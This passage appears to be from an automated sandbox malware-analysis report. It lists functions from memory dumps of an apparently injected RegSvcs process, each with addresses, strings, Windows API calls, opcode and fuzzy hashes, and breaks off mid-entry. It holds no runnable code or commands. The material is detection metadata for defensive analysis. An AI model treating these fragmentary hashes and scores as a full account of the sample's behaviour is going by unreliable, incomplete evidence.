API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 88efb25febcd069dae937fc6fa3a8678b607afc7712a3dfc4305ff911b577187
Instruction ID: e63d38d9d91ab34d9901d92bae1a214559e53979fa1179bb7a8fe9c1cb6ae818
Opcode Fuzzy Hash: 88efb25febcd069dae937fc6fa3a8678b607afc7712a3dfc4305ff911b577187
Instruction Fuzzy Hash: 65813270A04B098FD765DF29D54475ABBF2BF88304F00892ED58ADBB50DB34E849CBA0

Function 06D14168 Relevance: 1.6, Strings: 1, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hcq, xrefs: 06D14463

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID: Hcq
API String ID: 0-419967981
Opcode ID: 95cc5f2ebd0d6bc58433a09683edbc26418cbd998fed2290fc9d70bea473a492
Instruction ID: 77f51809e71f5625c35d7e02730255302d6009bf480032840732a55398e04611
Opcode Fuzzy Hash: 95cc5f2ebd0d6bc58433a09683edbc26418cbd998fed2290fc9d70bea473a492
Instruction Fuzzy Hash: 55D15C70E002069FDB54DFA9E9806AEB7F2FF84304F248569D8099F355EBB0D846CB91

Function 06D4A700 Relevance: 1.6, Strings: 1, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 06D4AAB4

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 22a28f9a727246af3441a39eaadc0e94f80e8e663562a943dd695e4f222cfaa4
Instruction ID: 5d656255f2240d82fedf6c6231c04b6221d6680dd2e850a410d30c7fecec29be
Opcode Fuzzy Hash: 22a28f9a727246af3441a39eaadc0e94f80e8e663562a943dd695e4f222cfaa4
Instruction Fuzzy Hash: C0C1BA35F002098FDB54EFA4C994AAEB7F2EF88714F248469D406AB358DB31DD46CB91

Function 027FC0D8 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,027FC941,00000800,00000000,00000000), ref: 027FCB52

Memory Dump Source

Source File: 00000003.00000002.1948182225.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27f0000_RegSvcs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 172d30c6ea0c5c557efaab4e221984e7ab6df7bab7fa2b54d49d5806f596512c
Instruction ID: a2e5e73d0593a53e4d114876b1f611dfe04b1017ff2f0dbfd653157077e2978b
Opcode Fuzzy Hash: 172d30c6ea0c5c557efaab4e221984e7ab6df7bab7fa2b54d49d5806f596512c
Instruction Fuzzy Hash: 821100B69043089FCB10CF9AC448A9EFBF4EB48324F10846EE519A7310C375A949CFA5

Function 027FC074 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,027FC68C), ref: 027FC8C6

Memory Dump Source

Source File: 00000003.00000002.1948182225.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27f0000_RegSvcs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0270f06ffec85c73a4a1d055c04cfe1a8a798f29b6e9da890113df5b0550f68c
Instruction ID: a2c91245e0e66f6451939c51e7f520696282fbe88ffe18b7a55e32e60f99d70f
Opcode Fuzzy Hash: 0270f06ffec85c73a4a1d055c04cfe1a8a798f29b6e9da890113df5b0550f68c
Instruction Fuzzy Hash: 6F11F0B6D043498FCB10DF9AD444ADEFBF4EB88224F14846AD519B7310C375A549CFA5

Function 06D44A58 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

(_^q, xrefs: 06D44B18

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: b7ed6d2d05084aeeead4b3400264a7f40595fef922139dc4386e635b2485fbfb
Instruction ID: e3d68577308d031da4e443f1d2e2d5521aaa42788da83a8474627c4f0d7ecb29
Opcode Fuzzy Hash: b7ed6d2d05084aeeead4b3400264a7f40595fef922139dc4386e635b2485fbfb
Instruction Fuzzy Hash: 9051EF70B002019FDB54EF68D894A6E7BE6FF89314B1885AAD805CB351DF31EC45CBA1

Function 06D44CB8 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

(_^q, xrefs: 06D44E4D

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: df285931676c5177b1e0ad17427d99b1defc0090693a91cd5a74c3b219de8a31
Instruction ID: 3b67d7b37af78d7d3df2efb3a3e7d0a9a615c1c523e99db32d708ed41e4efe11
Opcode Fuzzy Hash: df285931676c5177b1e0ad17427d99b1defc0090693a91cd5a74c3b219de8a31
Instruction Fuzzy Hash: 4F513F74A102089FCB04EF78D858AADBBF6FF89310F158469E405AB3A4DF359C46CB91

Function 06D4DCE8 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

(bq, xrefs: 06D4DD46

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 0e66007a63d519f579c889407c5f5df8808e42398cf8f2096c5069e05820c0cc
Instruction ID: 01652eaaf010dc38b96a01f9144018360cb4b97edbc054cdaa0d94499de04eb5
Opcode Fuzzy Hash: 0e66007a63d519f579c889407c5f5df8808e42398cf8f2096c5069e05820c0cc
Instruction Fuzzy Hash: 35419371B003049FC725EF28D554A6EBBE2EFC5310B148A6AD1468B765DB70EC8ACB91

Function 06D1B14D Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06D1B29B

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 28aa5e6bb8530dd06e17cc3ee8c6959ee374dea75a1bd1d788541bc2d6c6432c
Instruction ID: 0ffbfc2d6d848692eedd258c4ae383a8537da36a36d3c7a1e05d2b66fa03ad54
Opcode Fuzzy Hash: 28aa5e6bb8530dd06e17cc3ee8c6959ee374dea75a1bd1d788541bc2d6c6432c
Instruction Fuzzy Hash: DE311531F002049FDB559B74D9142AE7BE3EF89200F10492AD006DF394EE75DC8ACBA5

Function 06D4A2EB Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

(_^q, xrefs: 06D4A3D8

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: 3f1a687dab11ba9fef7b4ded9150f168cbfdcb9541e63e47985f5e2772ca48b7
Instruction ID: 7f293b8058cb7de49dabf40585ae6ba9eba89976703a99d9fe7a2ac2054bbefd
Opcode Fuzzy Hash: 3f1a687dab11ba9fef7b4ded9150f168cbfdcb9541e63e47985f5e2772ca48b7
Instruction Fuzzy Hash: 39413E71A00249DFCB54EFB8C958AADBBB2FF45300F14856EE405AB354EB349D49CB91

Function 06D1EF69 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Ocq, xrefs: 06D1EF75

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID: \Ocq
API String ID: 0-2995510325
Opcode ID: 9592ce3dea3056f808ed9cf665ef20afd183d5f4fb83f77818f73509bd30b9c2
Instruction ID: be858c0949cadd57fc6eade838f3cef7c19d84ddfb07a5e3aa784788b3f29493
Opcode Fuzzy Hash: 9592ce3dea3056f808ed9cf665ef20afd183d5f4fb83f77818f73509bd30b9c2
Instruction Fuzzy Hash: 4CF09E30E50119EFDB14DFA4F855BAEBBB2BF84704F204519E912AB294CBB55D45CB80

Function 06D11E32 Relevance: .9, Instructions: 941COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7107855eb8705b998f4291d7d5895145b349ebe09f381459304ce5b7a6d84bbd
Instruction ID: 3c82b364c539bc9b12a23b2d08dd71a4b90d42166522251d50a2d030fb30d4d4
Opcode Fuzzy Hash: 7107855eb8705b998f4291d7d5895145b349ebe09f381459304ce5b7a6d84bbd
Instruction Fuzzy Hash: 84826D74A05205CFCBA4EF28E590A2D77B2EB98B04F10456DD90ADB398DF719D82CF91

Function 06D115B0 Relevance: .6, Instructions: 560COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4851f07b87791e2361380dfd5fd0e751b608ea984ece484dc891b49262c7ca1
Instruction ID: b544e6a65f32ae49a9e38ca9c7201af24620c13b4b21ab5c64f8d1435f44fd16
Opcode Fuzzy Hash: e4851f07b87791e2361380dfd5fd0e751b608ea984ece484dc891b49262c7ca1
Instruction Fuzzy Hash: D1127DB0B01205AFCB25AB38E85962C77A3FB85700F144939E506CF365DFB5EC4A9B90

Function 06D115C0 Relevance: .6, Instructions: 550COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f4e76dfdd6d0b709f72c2ad810f670613edba8e6459081c0169193873522db7
Instruction ID: fb8e9fd69c87c75ca9c7af835683a1aab195b264c3f1dc7b891fd3f9fada0888
Opcode Fuzzy Hash: 9f4e76dfdd6d0b709f72c2ad810f670613edba8e6459081c0169193873522db7
Instruction Fuzzy Hash: 29127DB0B01205AFCB25AB38E95962C77A3FB85700F144939E506CF365DFB5EC4A9B90

Function 06D4C2FF Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b651ef69a69fc492f3cd9ce997a1a441947473ac72da1e12808e89c7be5b34
Instruction ID: 6da535f0b0b252e254e0ea48c7fbd2e7365009118788891a263b61cc0840f538
Opcode Fuzzy Hash: a4b651ef69a69fc492f3cd9ce997a1a441947473ac72da1e12808e89c7be5b34
Instruction Fuzzy Hash: 64129C74A01318CFCB2ADFB4D18899DBB72FF89305B61866DD515AB351CB36A982CF40

Function 06D4C310 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f96a031405e0fe7f6cdd65a9633acfbd84a60ecb7939b81df231318f2babc1b3
Instruction ID: 6d4864185917c4d86a7a17bef3daec76dc2f9853a780ec37fdd288871ffb2c29
Opcode Fuzzy Hash: f96a031405e0fe7f6cdd65a9633acfbd84a60ecb7939b81df231318f2babc1b3
Instruction Fuzzy Hash: 8C128A74A01318CFCB2ADFB4D18899DBB72FF89305B61866DD515AB351CB36A982CF40

Function 06D452D8 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3090a01eb4db1d379fa3509b625329250d761407b420cf0fb2699797948883
Instruction ID: c79cd7d738a0c8b3832e349961b4cc1855879363d5ffc197e7f1a54076875ad8
Opcode Fuzzy Hash: aa3090a01eb4db1d379fa3509b625329250d761407b420cf0fb2699797948883
Instruction Fuzzy Hash: 77F13874A00209DFDB55EFA8E598AADBBF2FF88310F144569E805AB390DB35DC45CB90

Function 06D13C48 Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c1416eb579a9f557c765eafca36e26d665602fe930efedc0731a727e6027d27
Instruction ID: 5034b314c6edc0eca4fb72b2bdb974d0bb464c666ef0be644b36a38fbbcf8b12
Opcode Fuzzy Hash: 2c1416eb579a9f557c765eafca36e26d665602fe930efedc0731a727e6027d27
Instruction Fuzzy Hash: C1D18E34B00205AFDB54DB69E984AAEBBF2FF89310F158569E406DB364DB71DC42CB81

Function 06D4CE60 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c9f19bb18cfa6759020631cda72abafaf24beab28de4124c930158ac018d158
Instruction ID: 150c698431d6364e04bdfb6061a158fbfbc21b7d39140dbd4b98767f3760cbc5
Opcode Fuzzy Hash: 6c9f19bb18cfa6759020631cda72abafaf24beab28de4124c930158ac018d158
Instruction Fuzzy Hash: 29D17834F002499FDB54EFB9D858AADBBF2AF89300F148469E805EB354EE74DC058B91

Function 06D1DA98 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6991198f707ea4d7f2cf9bba2369c0655d0841739c738925d5ecc94caf8f9753
Instruction ID: 658dda981782b9a53526098b7059c712f91d32c24b9f813fa72b4a36202e4a3a
Opcode Fuzzy Hash: 6991198f707ea4d7f2cf9bba2369c0655d0841739c738925d5ecc94caf8f9753
Instruction Fuzzy Hash: 61C11F70F10109AFDB64DB6CE990BAEB7B7EF89310F104926D005EB395DBA5DC428B91

Function 06D4D4A0 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c34f4e232d8b16f9edd9da1cc2a36a375342d1aa4916d593234d7a4d9d721bb0
Instruction ID: 23adcc43515591c49211e6cd3500fcd868f19568da9577473512c3c9af67d10c
Opcode Fuzzy Hash: c34f4e232d8b16f9edd9da1cc2a36a375342d1aa4916d593234d7a4d9d721bb0
Instruction Fuzzy Hash: C9C15971B002099FDB44EF79D944AAEBBF6FF88254B158529E805E7355EB31EC02CB90

Function 06D4E118 Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a2ca70c3cb38c9f042f22f335966c5f50be4d84409ea6444ec60b279747a4d7
Instruction ID: 40a3cad97ed2315eb32753c6f9b3cdd7616f4a28743efc1115246591024c850e
Opcode Fuzzy Hash: 5a2ca70c3cb38c9f042f22f335966c5f50be4d84409ea6444ec60b279747a4d7
Instruction Fuzzy Hash: 81C17AB8A0D101CFE7A8FB1CF580975B7B1F7A53407029054E2E68B6ACC779EC428B95

Function 06D4B398 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ab7d047f7dcb02fe5ce3b44dcac9482eac3c43e788d3a19544353aef64a22ed
Instruction ID: c579c0d82bc1264e8a6ea05f5850236260e14fb38ab172deb433f6cc94121670
Opcode Fuzzy Hash: 5ab7d047f7dcb02fe5ce3b44dcac9482eac3c43e788d3a19544353aef64a22ed
Instruction Fuzzy Hash: 40A1D275A01208EFCB44DF68D898E99BBF2FF89324F154596E5059B362DB30EC85CB50

Function 06D4B040 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdeae3a313bc3fd14d7cdfb0f0c6d8aa6496c9ab9bae25acafd1f4a9cd2906c4
Instruction ID: 0d49165d0f56adea2f4401e81e3c6f8d29321df785cf650855fdb3eafabc279c
Opcode Fuzzy Hash: fdeae3a313bc3fd14d7cdfb0f0c6d8aa6496c9ab9bae25acafd1f4a9cd2906c4
Instruction Fuzzy Hash: 0461B071F001114FCF50AB7EC89466FAAD7AFD5620B25443AD80EDB364DEA6DD0287C6

Function 06D1E58D Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bbedc242c5fc1ad3e033c9905f2989e3196fd52c3af0ad16e44bafc0d0c57f5
Instruction ID: b982d9ca774c8f290d04a63984549393772e2d4edaace8682e4860177132fd3d
Opcode Fuzzy Hash: 5bbedc242c5fc1ad3e033c9905f2989e3196fd52c3af0ad16e44bafc0d0c57f5
Instruction Fuzzy Hash: B2814C30F1020A9FDB54DBA9D45466EB7F2AB89304F108529D80ADB394EA71EC428B91

Function 06D1E590 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d282f86f3b76e7e0ab483b3a89169b43c16a7bc4bc9118fbfe5df8c2cd0f5263
Instruction ID: a8670a3a5308a6f5628537080d5ad89e9e4dced6c16b36d0b654f8e5ab1425a0
Opcode Fuzzy Hash: d282f86f3b76e7e0ab483b3a89169b43c16a7bc4bc9118fbfe5df8c2cd0f5263
Instruction Fuzzy Hash: 71814B30F0020A9FDB54DBA9D554A6EB7F2AFC9304F108529D80ADB394EE75EC428B91

Function 06D4BE9F Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50f4e7ec5b0bfad4c50fbd367e4ac96b8ba56b4c0bf7067890a47c81d9ede273
Instruction ID: 70eb67686ef89842a1be8870ff7dd45cb818c6e5cf4f9193220d10539fdb058f
Opcode Fuzzy Hash: 50f4e7ec5b0bfad4c50fbd367e4ac96b8ba56b4c0bf7067890a47c81d9ede273
Instruction Fuzzy Hash: 2E81BB74A013459FCB55DF78C884AA9BBF2FF49300F1485AAE8069B761DB31EC46CB50

Function 06D1AD08 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e73e5a73ca6bec9c17f7beacd1b02d2f0c5bd35413ef067fd51715850be705c4
Instruction ID: 3fac963ae2e090b2b663e680159ffdd585a9206ac145b1d7d081c7b558670eba
Opcode Fuzzy Hash: e73e5a73ca6bec9c17f7beacd1b02d2f0c5bd35413ef067fd51715850be705c4
Instruction Fuzzy Hash: 83718071F0030A9FCB15DFA9D4406AEB7B2FF85304F148529E409AF354EBB4E8468B81

Function 06D1EAE3 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f84b07a6ddf3d056f6bf35366ee7f912824f57d8766257aae64e05e0bf3f6a7
Instruction ID: a3ee2e853173043f44a3f6ee38e61995acbef2339e2cffa76075a07f09dc68b5
Opcode Fuzzy Hash: 2f84b07a6ddf3d056f6bf35366ee7f912824f57d8766257aae64e05e0bf3f6a7
Instruction Fuzzy Hash: CC913C30E106199BDF60DF68C980B9DB7B1FF89300F208599D549BB355EB70AA85CF91

Function 06D41E5B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 883cb0c957d1ccf351ea0117c5d10bcd0c0b087be68233a343c9536360865f2f
Instruction ID: 157681f201362fdd779271533aef311360edaef37184e7a3ebd97acfecf62687
Opcode Fuzzy Hash: 883cb0c957d1ccf351ea0117c5d10bcd0c0b087be68233a343c9536360865f2f
Instruction Fuzzy Hash: 63711870A002099FDB54EBA9D994AADBBF6EF84300F248529E409EB355DB70ED46CB50

Function 06D41E60 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a586765ab177f9ec7da6393a89a4025fad29061dc43dacc750d8d365387eb28
Instruction ID: d6e4ebfa3f20e9d5c3739768b45499976364117c578c7b5ca540643528b51285
Opcode Fuzzy Hash: 6a586765ab177f9ec7da6393a89a4025fad29061dc43dacc750d8d365387eb28
Instruction Fuzzy Hash: BF712A70B002099FDB54EFA9D994AADBBF6EF84300F148529E409EB355DB70ED46CB50

Function 06D446B6 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8dd14cbdc7e2b8e25f67dbab75a2f2065964ad7c72215770294a371c4b832b
Instruction ID: 484dd216831b450296e44d6af9712a7a616a494e86a139a246c1c2e498178309
Opcode Fuzzy Hash: 0a8dd14cbdc7e2b8e25f67dbab75a2f2065964ad7c72215770294a371c4b832b
Instruction Fuzzy Hash: F4811D34E00209CFDB24EFB4D858AADBBB1FF49305F14856DD516AB261DB349986CF81

Function 06D42BC3 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02fde2521170436a5133fffb097635a37aeabbafd6a583ca29cfa8133a04dc8a
Instruction ID: b124b73d3cf2c0950876526fdefe30f74510841297061c96b4df0ca179796c0d
Opcode Fuzzy Hash: 02fde2521170436a5133fffb097635a37aeabbafd6a583ca29cfa8133a04dc8a
Instruction Fuzzy Hash: AF51CD71E001099FDB64BB78E8946ADBBB2EF84315F208869E506DB250DB31DE59CB81

Function 06D4A470 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 409136a9d42afacf40ed2e115334d5797851e907fa7f68818e0a94dbdc3cc619
Instruction ID: 4444ed0276d67f70c9ef17bc093e9195cb2ba9187954339ac930afa46f823501
Opcode Fuzzy Hash: 409136a9d42afacf40ed2e115334d5797851e907fa7f68818e0a94dbdc3cc619
Instruction Fuzzy Hash: 78519036E107058FCB61EB68D94869EB7F1FF88310F14862ED44A97754EB70E845CB91

Function 06D1FAAB Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3238a3d958f6b3f9981c50b37c44e40debf2d44ed75ce0fe83d9d63da2fefecc
Instruction ID: 7ab970af07143d949b2d99e26e9cb779352ceec476c6a41325787a2d4517dc95
Opcode Fuzzy Hash: 3238a3d958f6b3f9981c50b37c44e40debf2d44ed75ce0fe83d9d63da2fefecc
Instruction Fuzzy Hash: DC51B171E00205AFDF718B68E5D0B7EB7F2EB45310F248866E55ADF281C6B4D841DB91

Function 06D42973 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf77489be9a3ad2057f2b789c37a84b82557376289cdc7b654b30cc1abf03493
Instruction ID: 9555f16afa98bfc9a762daac7f318afa6724a32bb9f219cdccbad23ba40e1a3d
Opcode Fuzzy Hash: cf77489be9a3ad2057f2b789c37a84b82557376289cdc7b654b30cc1abf03493
Instruction Fuzzy Hash: BE51AA30B102149FEF747B6CD95473F265BEB89710F204829F40AD77E8C9A6CD4647A2

Function 06D42978 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

